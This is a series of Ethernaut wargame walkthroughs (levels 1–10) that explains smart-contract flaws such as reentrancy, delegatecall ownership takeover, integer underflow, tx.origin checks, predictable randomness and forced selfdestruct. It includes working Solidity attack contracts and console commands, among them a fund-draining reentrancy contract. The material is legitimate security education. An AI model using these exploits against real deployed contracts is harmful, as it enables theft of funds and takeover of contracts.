cat root.txt
Congrats!!!
Here is your flag:

[Root Flag]

Hope you like this walkthrough. Happy Hacking!!

Ethernaut Level 10 Walkthrough - Re-entracy

hamzairshad02 — Thu, 24 Aug 2023 05:00:16 +0000

This level is about the most famous Smart Contract Vulnerability and it’s quite a simple but highly impactful logic flaw. Lets first look at the definition of Re-entracy.

A reentrancy attack occurs when a function makes an external call to another untrusted contract. Then the untrusted contract makes a recursive call back to the original function in an attempt to drain funds.

When the contract fails to update its state before sending funds, the attacker can continuously call the withdraw function to drain the contract’s funds.

Although this definition talks in terms of fund transfer think of Re-entracy as a While loop that we use in programming. In a While loop, the looping process doesn’t end until a certain condition is met, so the set instructions inside the loop just keep running again and again. Something similar is happening in this level too. Let’s start by understanding the contract first.

The contract starts off with importing SafeMath library and using it on uint256 to avoid Integer Arithmetic Error vulnerability. Well that’s cool but the contract is still vulnerable though. The next is a public variable “balances” which is a mapping of address as its key and uint as its value.

import 'openzeppelin-contracts-06/math/SafeMath.sol';

contract Reentrance {

  using SafeMath for uint256;
  mapping(address => uint) public balances;

The very first function is “donate” through which someone can donate some funds to the contract.

function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

The next is “balanceOf” function which just returns the balance of someone with respect to its address.

function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

Then comes the very important looking function “withdraw” which first checks that whether the balance of contract that is being attempted to withdraw is greater or equal to the requested amount. It then proceeds to send that amount to the requester and finally it attempts to change the state of contract by deducting the withdrawn amount from the balance of contract.

function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }

Also there is an externally payable receive() function making a cameo appearance. (Just kidding!)

receive() external payable {}

Now that we understand the contract, we gotta break it from somewhere. And for that the level provides a bunch of hints in which this one is important.

Sometimes the best way to attack a contract is with another contract.

So we gotta find some clue where we can utilize another contract. And our clue is in the “withdraw” function. As this function attempts to send withdrawn amount to the requesting contract, we can use that contract’s payable function to our advantage.

We can call in the “withdraw” function of our given contract in our own contract’s payable function. And by that the “withdraw” function calls the payable function our contract which again calls the “withdraw” function in given contract so the contract is stuck in the loop of withdrawing balances until all is drained out. When the contract will run out of balances, that’s when the condition of this function breaks and then it finally attempts to change the state of contract by deducting the requested amount from balances which has now dropped to 0.

With that in mind, let’s create a contract like the following,

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface PillarsOfTheHack {
    function donate(address) external payable;
    function balanceOf(address) external view returns (uint256);
    function withdraw(uint256) external;
}

contract TheReentranceHack {
    PillarsOfTheHack private immutable reentrancy;

    constructor(address _reentrancy) {
        reentrancy = PillarsOfTheHack(_reentrancy);
    }

    function thehackitself() public payable {
        reentrancy.donate{value: msg.value}(address(this));
        reentrancy.withdraw(msg.value);
        require(address(reentrancy).balance == 0, "FAILED!!!");

        selfdestruct(payable(msg.sender));
    }

    receive() external payable {
        uint256 balance = reentrancy.balanceOf(address(this));

        uint256 withdrawableAmount = balance < 0.001 ether
            ? balance
            : 0.001 ether;

        if (withdrawableAmount > 0) {
            reentrancy.withdraw(withdrawableAmount);
        }
    }
}

With this contract in place, use the instance address of the given contract while deploying it like the following,

Now just add the instance address of given contract in At Address bar and set the Gwei value to 1000000 (which is equal to 0.001 ether) and run “thehackitself” function.

Finally, ensure that your hack worked right by checking it from the console of the level.

And we managed to drain all the balance from the contract by donating 0.001 ether first, pushing the total balance to 0.002 ether. Then we withdraw the balance to 0 by making two iterations of 0.001 ether which is allowing us to reenter the contract and trigger the same function with total drain.

Now just Submit Instance and voila!!

Ethernaut Level 9 Walkthrough - King

hamzairshad02 — Thu, 24 Aug 2023 04:56:30 +0000

The instructions of this level explains it pretty much. You have to become the King of this contract by sending the most amount and remain King for future as well so nobody can dethrone you. Let’s start with understanding the contract first.

The contract starts with three variables. “king” as address, “prize” as uint, and “owner” as address.

address king;
uint public prize;
address public owner;

Then comes the constructor which is payable (meaning it can receive ether) and sets the contract initializer as ‘owner’ and ‘king’ and sets its sent value as ‘prize’.

constructor() payable {
    owner = msg.sender;  
    king = msg.sender;
    prize = msg.value;
  }

Next is a receive() function which is also payable and external (meaning it can be only be called by another contract and not itself). In this function, it requires the ether sender to have more or equal the value of “prize” OR it should be the “owner” of the contract. It then proceeds to use the transfer() method to transfer all the ether to the current dethroned “king” then set the ether sender as the new “king” and its sent ether as the new benchmark “prize”.

receive() external payable {
    require(msg.value >= prize || msg.sender == owner);
    payable(king).transfer(msg.value);
    king = msg.sender;
    prize = msg.value;
  }

Finally there exists a _king() function which returns the address of the current throne “king”.

function _king() public view returns (address) {
    return king;
  }

We will tackle this problem by creating a contract of our own which doesn’t have any function to receive ether.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract WatchTheThrone {
    constructor() payable {
        address king = 0xd604cf3775FcCc4E9A06416C354A55C7f5C6c050;

        (bool sent, ) = king.call{value: msg.value}("");
        require(sent, "Failed to send Ether");        
    }
}

Here I created a contract by the name of one of the most luxurious rap album of all time forged by Ye & Jay-Z. This contract starts with a constructor which also happens to be payable so it can send ether to a contract. Inside the constructor, there is an address of king which is your Ethernaut Level Instance Address, next is a call() method being used with the same king having the value of ether that is being sent and is checked by a boolean. The require() method beneath it just throws an error in case the bool gives false and the ether is failed to be sent. We do not have a function in our contract which can receive ether so in this way we send the ether become the king and then nobody can dethrone us, all they can do is Watch The Throne.

Set the Deployment configuration as follows and deploy the contract.

After deploying the contract check the king of the contract and it will be yours by the following command

await contract._king()

Now just “Submit Instance” and then Ethernaut will attempt to become the new King but will eventually fail and we win!

Ethernaut Level 8 Walkthrough - Vault

hamzairshad02 — Thu, 24 Aug 2023 04:54:52 +0000

This level emphasize on the concept of Blockchain that everything on a Blockchain is for everyone there to see. In this level, the contract acts a vault which requires a password to get in. Let’s breakdown the contract first to understand it.

The contract starts with declaring two State Variables, a boolean “locked” and a bytes32 “password” which are public and private respectively. Remember that State Variables are stored on the Blockchain.

bool public locked;
bytes32 private password;

Next is the constructor of the contract which takes in the password as the parameter and sets the “locked” to true and saves the password in the variable “password”.

constructor(bytes32 _password) {
    locked = true;
    password = _password;
  }

A function by the name unlock() also resides there which asks for the password in the parameter and checks if it is the correct password then proceed to set the “locked” to false unlocking the Vault.

function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }

Now this states that the contract requires a _password in its unlock() function to win the level. See that the _password is going inside the constructor while we initialize the contract so the password is already there we just need to extract it somehow to put it inside our unlock() function.

You see that the password variable is declared as private so it means no other contract can access it but it is declared as a State Variable which implies that it is stored on the Blockchain. So we need to extract the password right from the Blockchain.

Since Blockchain has its transparency we can check the storage to see the State Variables value. Now since the first declared variable is “locked”, its index must be at 0. The second declared variable is “password” which we need to see the value of, its index must be at 1.

We can use the following command to check the value of “password”

Now use this value in the unlock() function by the following command

Finally just click “Submit Instance” and you win!

Ethernaut Level 7 Walkthrough - Force

hamzairshad02 — Thu, 24 Aug 2023 04:52:51 +0000

This level seems like a cruel joke. There is literally no code at all inside the contract and just a cat meowing at us wtf. Stuff like this makes me suicidal and what does this type of behavior called? Self Destruct. And there exists a concept of self destructing a contract in Ethereum.

How do I got to know that I have to self destruct the contract? I honestly had to google a lot since the only helpful hint was “Sometimes the best way to attack a contract is with another contract” so i learned that selfdestruct() method lets you destroy your smart contract and move all remaining Ethers to another address so i will just be needing another contract to move all the ether from that in this given level contract to win. This justifies the tier 3 difficulty this level has.

Now the name of this level makes sense. The contract itself has no method of receiving any ether so we will selfdestruct() our contract and Force this level’s contract to ultimately accept our remaining ether since it will have no choice but to accept it.

So let’s start by coding up our contract as follows

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Enforcer {
    constructor () payable { 
    }

    function getBalance() public view returns (uint256) {
      return address(this).balance;
    }

     function suicidesquad() public {
      selfdestruct(payable(address(0x25205608cb59bf58c1D2440388480c9B8d69DB11)));
    }
}

In this contract, three functions are coded. First is a payable constructor() which lets you send some ether into this contract while deploying it. Second is getBalance() which will show you the balance present in your contract. Last is the suicidesquad() function which calls in the selfdestruct() method to destroy this contract and force our given level contract to accept the ether since we mentioned its address in the method. To know the address of the given level contract you can simply do it by the following command.

Now deploy your contract with an initial value of 10000000000000 wei which equals to 0.00001 eth. I am using Remix IDE so this is my configuration while deploying the contract.

Then use the getBalance() function to check that you have 0.00001 eth in your contract. Then simply use suicidesquad() function to destroy the contract and force the given level contract to accept the 0.00001 eth and win the level.

You can verify that the level contract has accepted and received the eth by the following command

Now just click on “Submit Instance” button and see your goody good winning banner.

Ethernaut Level 6 Walkthrough - Delegation

hamzairshad02 — Thu, 24 Aug 2023 04:29:47 +0000

The hint of this level lies in its name, Delegation. According to Wiki

A Delegation is the assignment of authority to another person (normally from a manager to a subordinate) to carry out specific activities.

Yes i still get my information from Wikipedia. Now let’s understand the code of this level. This level contains two contracts, Delegate and Delegation.

In the Delegate contract, the constructor takes an address and makes it the owner of the contract. There is another public function pwn() in which whomever initialize the contract becomes the owner of it.

contract Delegate {

  address public owner;

  constructor(address _owner) {
    owner = _owner;
  }

  function pwn() public {
    owner = msg.sender;
  }
}

In the Delegation contract, it first calls in the Delegate contract then its constructor proceeds to take in the address of Delegate contract and store it in delegate and also makes the contract initializer the owner of the contract. Also exists a fallback() function which triggers when there is no other function in the contract executes properly. In the fallback() function it calls the pwn() function of Delegate contract by stating the Delegate contract address and then calling delegatecall() function to execute the pwn() function and set it to a bool result condition which checks whether the address is the current address of the contract.

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;
  }

  fallback() external {
    (bool result,) = address(delegate).delegatecall(msg.data);
    if (result) {
      this;
    }
  }
}

What a delegatecall() is that it lets you call a function on another contract while keeping the original data context. Think of it like calling a function from a library that we do in other programming languages. So we are allowing the Delegate contract to run its pwn() function inside our Delegation contract conforming to the title of this level.

When you Get New Instance only the Delegation contract works not the Delegate contract since it acts like a library to the Delegation contract. Now we cannot be the owner of the Delegation contract since we initialize it goes with the address of the Level and not our address. You can confirm this by the following command.

You see the conflict now? Since we only have access to Delegation contract and it is calling a function from Delegate contract and not of its own we cannot push in our own address to become the contract owner. So we need to hit the pwn() function somehow.

In order to do so, we run the following command

await sendTransaction({
    from: player,
    to: contract.address,
    data: "0xdd365b8b"
})

In this command, you can understand that the sender is the player which is us and the receiver is the level, but what is this strange data value that we are sending in the transaction. EVM calls the functions by looking at the first 4 bytes of the function signature. In our case, the signature is keccak256 which is basically sha3. So if we want to obtain the signature of pwn() function we would run the following command to know Hexadecimal value of pwn() which is of 4 bytes equaling to dd365b8b.

So we push it into the data and can now manipulate the pwn() function to become the owner of Delegation contract by the command stated above.

Now you have become the owner of the contract and can confirm this with the following commands.

Now just Submit Instance and WIN WIN WIN WIN!

Ethernaut Level 5 Walkthrough - Token

hamzairshad02 — Thu, 24 Aug 2023 04:24:58 +0000

This level comes with a hint: odometer. An odometer is an instrument used for measuring the distance traveled by a vehicle. It usually has a starting value of 000000 and ends at 999999. Now what does it even have to do with our contract eh? For that we have to understand the contract first.

Let’s start by understanding the contract first.

The contract starts with two variables, first is “balances” which is a mapping of address as its key and uint as its value. The second is “totalSupply” which is a public uint. Remember that a uint declared is a uint256 by default which has a value from 0 to 2^256 which is equal to 115792089237316195423570985008687907853269984665640564039457584007913129639935. A starting value and an ending value just like an odometer.

mapping(address => uint) balances;
uint public totalSupply;

Then comes the constructor of the contract which takes an _initialSupply value in its parameter and declares it equal to the totalSupply which is equal to the balances.

constructor(uint _initialSupply) public {
    balances[msg.sender] = totalSupply = _initialSupply;
  }

Next is a function called transfer() which takes two parameters, the address of the person _to whom the _value will be sent and returns a boolean.

function transfer(address _to, uint _value) public returns (bool)

Inside this function it contains a requirement that the subtraction of _value from the balance of sender should be greater than or equal to 0. If that fulfils it proceeds to subtract the _value from the balance of sender and add it to the balance of whom the _value is sent _to and returns true at the end.

{
    require(balances[msg.sender] - _value >= 0);
    balances[msg.sender] -= _value;
    balances[_to] += _value;
    return true;
  }

The last function of this contract just returns whatever the balance the _owner of the contract has.

function balanceOf(address _owner) public view returns (uint balance) {
    return balances[_owner];
  }

So where do you see the conflict? In the hint. You see, in an odometer if you exceed its limit of 999999 it will just simply reset back to 000000 because it does not have a value further than that, this is called an overflow. Similarly, if we go backwards from 000000 it will go to 999999 because it does not have a value lower than that, this is called an underflow. Now remember i asked you to remember that uint is by default uint256 which has a range from 0 to 2^256. Now if you go below 0 it will reset to 2^256 and if you go further than 2^256 it will rest to 0.

How many tokens we have initially? 20. How many we want to win the level? Many. So if we subtract 21 from the initial token value of 20 it will reset back to 2^256 which is just way way too many and this subtraction occurs in the transfer() function.

Start by launching the console of this level and type the following command to send 21 tokens to a dummy address of 0.

await contract.transfer('0x0000000000000000000000000000000000000000', 21)

And voila that’s it you won! Check your balance by the following command now.

await contract.balanceOf(player).then(v => v.toString())

Now just click on “Submit Instance” and claim your win.

Note that it worked because contract's compiler version of the contract is v0.6.0. This will most probably won't work for latest versions v0.8.0 and above because underflow/overflow causes failing assertion by default in latest versions.

Ethernaut Level 4 Walkthrough - Telephone

hamzairshad02 — Thu, 24 Aug 2023 04:21:46 +0000

This level represents the working of a Telephone call, hence the level name. In a Telephone call, your call doesn’t directly go towards the person you are calling, there is a tower in between where your call goes first then it gets redirect to the recipient of the call (even though there are many other things like BTS and MSC among a call between two persons but let’s just keep it simple for now).

So the code in this level is quite short and simple. It has only function changeOwner() which requires you to not be the origin of the transaction in order to obtain ownership of the contract.

When you call the function in this contract there is only you and the contract interacting, no middle-man in between which the transaction can go through (just like a tower to make a telephone call) so we need a middle-man in order to become the contract owner.

You see the conflict now? You have to be a non-originator in order to become the owner of the contract.

Let’s start by understanding the difference between tx.origin and msg.sender. In msg.sender both the user wallet address and smart contract address can be the msg.sender while in tx.origin only user wallet address can be the tx.origin. So in this contract, currently the tx.origin and msg.sender are the same which is user wallet address so we need to give msg.sender a smart contract address to breach the only condition written inside changeOwner() function.

if (tx.origin != msg.sender) {
      owner = _owner;
}

For this, we first need to paste the original contract inside a file (I named it Telephone.sol) and then we make another contract of our own which I named Attacker.sol as follows.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "./Telephone.sol";

contract Attacker {
    Telephone telephone;

    constructor(address _address) public {
        telephone = Telephone(_address);
    }

    function changeOwner(address _address) public {
        telephone.changeOwner(_address);
    }
}

What this contract does it calls the actual contract address which we named Telephone.sol inside the constructor. It then takes the address of the attacker which will be our Metamask wallet itself and use that to change the owner of the actual contract which we named Telephone.sol of course.

Now compile both the contracts Telephone.sol and Attacker.sol then go towards Deploy. In Deploy, change the environment to “Injected Provider - Metamask” and choose the contract Attacker.sol. Right below it you’ll see a Deploy button, put your Instance Address inside it. To check what it is type await contract.address in the console. See the screenshot below for reference.

After clicking the Deploy button you’ll see the changeOwner button down below, put your Metamask address inside it and click the changeOwner button to take the ownership of this contract and win the level.

Now you can check the owner of the contract by typing await contract.owner() inside the console and will see that your Metamask address is now showing up there. I have attached a screenshot of the initial owner address, instance address and current owner address respectively of the contract down below.

Finally click the “Submit Instance” and that’s how you win.

Ethernaut Level 3 Walkthrough - Coin Flip

hamzairshad02 — Thu, 24 Aug 2023 04:18:39 +0000

This level represents a simple Coin Flip game where you need to guess that either the coin is going to be Heads or Tails for 10 times consecutively. Now when you flip a coin in real life the chances of Heads and Tails are random. But in this contract the coin flip randomness is calculated by a logic.

The contract contains only one function ‘flip()’ which asks for a guess and returns a bool if the guess is true or false based on a calculation.

function flip(bool _guess) public returns (bool) {

In the calculation logic, the function first calculates the blockValue by getting the blockhash of a blocknumber subtracted by 1.

uint256 blockValue = uint256(blockhash(block.number.sub(1)));

It then proceeds to check whether this calculated hash which is assigned to the blockValue is equal to the previous hash value. If it is the case then it reverts back. If it is not the case then the new lastHash is the current blockValue.

if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;

Then it proceeds to calculate the coinFlip value by dividing the blockValue with a given FACTOR number which is hardcoded in the contract.

uint256 coinFlip = blockValue.div(FACTOR);

Then the function proceeds to check what side of the coin came into the result by checking if the coinFlip value is 1 then it is true (similar to Heads of a coin), otherwise it is a false (similar to Tails of a coin).

bool side = coinFlip == 1 ? true : false;

Now the function compares the side of the coin to the guess that was required in the input of this function. If the guess is correct then the consecutiveWins streak gets an increment, if vice versa then the consecutiveWins is set back to the default 0 and one has to start all over again to guess the answer 10 times consecutively in a streak.

if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }

What we need is to have the correct guess 10 times in a row to win this level. Now that we understand the logic behind this contract we can use the same logic to calculate the guess on our own made contract and then send this value as a guess from our contract to the given contract and the have correct result every time.

In order to do this, we first need the instance address of the level which is obtained by clicking on the “Get new instance” button.

After that we can launch REMIX IDE and copy the contract given in the level into a new file and make a contract of our own below it and give the instance address of the level to this new contract that we created.

In our contract, we will copy the same calculation logic from the original contract and then write an if-else below it to check if the guess is correct then we will send it to the original contract, if the guess is wrong then we will send the opposite of it to the original contract.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract hackCoinFlip {
    CoinFlip public originalContract = CoinFlip("0xdBe530a1A4C84e392Fea2bA9e8E0F5482eC37907"); 
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    function hackFlip(bool _guess) public {

    uint256 blockValue = uint256(blockhash(block.number-1));
    uint256 coinFlip = blockValue/FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
        originalContract.flip(_guess);
    } 
    else {
        originalContract.flip(!_guess);
    }
    }
}

Now can you see the hack behind our contract? What we simply doing is calculate the guess by the same logic as the original contract. Since it is a coin it has only two sides, Heads or Tails. So if we get Heads right then we will send it, if it is not Heads then it must be Tails so we will send that to the original contract and have a consecutiveWins increment.

The whole contract will look like this. Note that SafeMath library is commented along with sub() and div() being replaced since it was not working due to compiler and version errors of solidity.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

//import "@openzeppelin/contracts/utils/math/SafeMath.sol";

contract CoinFlip {

  //using SafeMath for uint256;
  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  constructor() public {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    uint256 blockValue = uint256(blockhash(block.number-1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue/FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

contract hackCoinFlip {
    address originalAddress = 0xdBe530a1A4C84e392Fea2bA9e8E0F5482eC37907;
    CoinFlip public originalContract = CoinFlip(originalAddress); 
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    function hackFlip(bool _guess) public {

    uint256 blockValue = uint256(blockhash(block.number-1));
    uint256 coinFlip = blockValue/FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
        originalContract.flip(_guess);
    } 
    else {
        originalContract.flip(!_guess);
    }
    }
}

Compile and Deploy this file and run hackFlip() function 10 times. Make sure to set the Environment to “Injected Provider - Metamask” in Remix IDE before deploying to have it deployed on your test network.

Now running the hackFlip() 10 times gonna take a lot lot time considering you have to confirm transaction on MetaMask and then view on etherscan to complete one cycle so be patient about that.

Finally, click on the “Submit Instance” button to have your win.

Ethernaut Level 2 Walkthrough - Fal1out

hamzairshad02 — Thu, 24 Aug 2023 04:16:43 +0000

This level reminds me of that Todd Howard game which 4th installment was heavily criticized and memed out because of the errors present in the game. This level indicates the very same scenario.

The very first hint to solve this level is given right at the title of the level name.

You notice that underline on the L1? That is our way out to solve this level.

Let’s start by understanding our contract first by understanding each function present in there.

Fal1out(): This function is commented as the constructor of the contract which indicates the one calling out this function is the owner of this contract. Usually when a contract’s constructor is called the one deploying the contract is the owner if it is not changed by some other condition or method.
allocate(): This function allocates the amount to the allocator.
sendAllocation(): This function requires you to have allocations more than zero in order to send them.
collectAllocations(): This function collects all the allocations and is locked by the ‘onlyOwner’ modifier which requires you to be the owner of the contract to utilize this function.
allocatorBalance(): This function simply returns the allocations by an allocator.

Now we see that we need to take ownership of this contract and unlock the ‘collectAllocations()’ method to collect all the allocations and finish the level.

Now look at the very first function of this contract which is commented as the ‘constructor’ and look at the contract’s name. Notice how both the constructor and contract name is different? This is the conflict that we need to take advantage of. As our very first hint at the title also highlights the spelling mistake between ‘Fallout’ and ‘Fal1out’ so this implies that there is no constructor declared for the contract.

Now when we deploy the contract by clicking ‘Get new instance’ button we can see that there is actually no owner declared for the contract by the following commands.

This is due to the typo in the constructor which implies that it is never called and hence the contract is deployed without an owner.

So in order to simply become the owner we have to call the ‘Fal1out’ function and unlock the ‘collectAllocations()’ method to collect all the allocations.

This can be done by the following command and can be verified.

As you can see we called the ‘Fal1out()’ function and became the owner of the contract all we have to do is finally call the ‘collectAllocations()’ function to finish the level.

Now simply click on ‘Submit Instance’ button and get done with the level.

Ethernaut Level 1 Walkthrough - Fallback

hamzairshad02 — Thu, 24 Aug 2023 04:14:01 +0000

As indicated by this level’s name, it utilizes a Fallback function. Now what a fallback function is defined below:

A Fallback Function is triggered whenever a method is called which is not present in the contract.

Now in our contract we can see the Fallback Function here.

receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }

How do we indicate this is the fallback function? Because it is a function with no ‘function’ keyword attached to it. If you see all the other functions you can see the ‘function’ keyword attached to them.

Now how many functions do we have in this contract. Each is explained below:

constructor(): This is the constructor of the contract which tells us that the contributions should be 1000 ETH in order to be the owner of the contract.
contribute(): This function indicates that you can contribute an amount less than 0.001 ETH. This also indicates that if your contributions are more than the current owner (which is 1000 ETH) then you can become the owner of the contract.
getContribution(): This function simply returns your contributed amount.
withdraw(): With this function you can withdraw all the available balance but it also uses an ‘OnlyOwner’ modifier which requires you to be the owner of the contract in order to withdraw.
recieve(): This is the Fallback function which indicates that your contributions should be more than zero in order to become the owner of the contract.

Now you get the clear picture of the contract. You can see that the contract requires you to contribute 1000 ETH in order to be its owner but its Fallback function says that you can become the contract owner if your contributions are more than zero. This is where the conflict arises and this is what we take advantage of so we can unlock the withdraw() function and take out all the balance from the contract.

So lets start by using the console and checking the address of the contract owner and our own player address. Note that you can use the help() to see all the options available in the console.

As you can see both the addresses are different and we have to be the owner of this contract.

You can also see the contributions of both by the following commands.

As you can see the owner’s contribution is 1000 ETH which is written in Wei and our contribution is 0 ETH so obviously we can’t be the owner.

Now let’s contribute something to the contract by the following command:

Now since we have contributed to the contract we can finally take advantage of the Fallback function by triggering it and become the owner of this contract since all it requires is to have a contribution more than zero and that’s what we did just now.

So in order to trigger it. Let’s use the same command as above but without any function present in the contract.

Notice how we didn’t use ‘contribute’ method this time which triggered the Fallback function and in this function it is only required to have a contribute more than zero to become the owner of the contract. So finally we have become the owner of this contract. Now this can be verified by the following command.

As you can see both the contract owner and player are the same so we have finally unlocked the withdraw function. So let’s utilize it by the following command.

Now just click the Submit Instance button and see your winning message.